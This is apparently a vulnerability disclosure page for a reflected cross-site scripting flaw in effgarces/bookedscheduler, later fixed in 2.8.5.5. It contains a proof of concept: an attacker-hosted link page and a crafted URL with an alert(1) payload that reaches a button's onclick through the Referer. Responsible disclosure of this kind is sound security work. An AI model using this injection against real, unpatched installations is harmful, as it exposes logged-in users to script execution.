Cross-site Scripting (XSS) - Reflected in effgarces/bookedscheduler

Valid

Reported on

Feb 8th 2022

http://192.168.5.5/phpsch/

(Attcker)

http://192.168.5.5/Web/reservation.php?rn=62020af2eee4d833634703

The attacker creates and installs a web page on another server (http://attacker). The contents are as follows.

<a href="http://192.168.5.5/phpsch/Web/reservation.php?rn=62020af2eee4d833634703" referrerpolicy="unsafe-url">link</a>

The attacker asks the victim (who is already logged in) to access a URL like the following.

http://attacker/bookedxss.html?';alert(1)//

The victim clicks on the link and is presented with a page to edit the attacker's reservation.
There are three buttons in the upper right corner, and if the victim clicks on the "Cancel" button, an alert will pop up (and then the victim will be redirected to the attacker's page).

The HTML will look like this

<button type="button" class="btn btn-default" onclick="window.location='http://attacker/bookedxss.html?&apos;;alert(1)//'">

＃　Operation was confirmed with the Chrome browser for Windows.

We are processing your report and will contact the effgarces/bookedscheduler team within 24 hours. a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

We have contacted a member of the effgarces/bookedscheduler team and are waiting to hear back a year ago

commented a year ago

Maintainer

Thank you for the information. I will try to replicate this and get back to you as soon as I can.

effgarces validated this vulnerability a year ago

yujitounai has been awarded the disclosure bounty

The fix bounty is now up for grabs

We have sent a fix follow up to the effgarces/bookedscheduler team. We will try again in 7 days. a year ago

effgarces marked this as fixed in 2.8.5.5 with commit bed96d a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation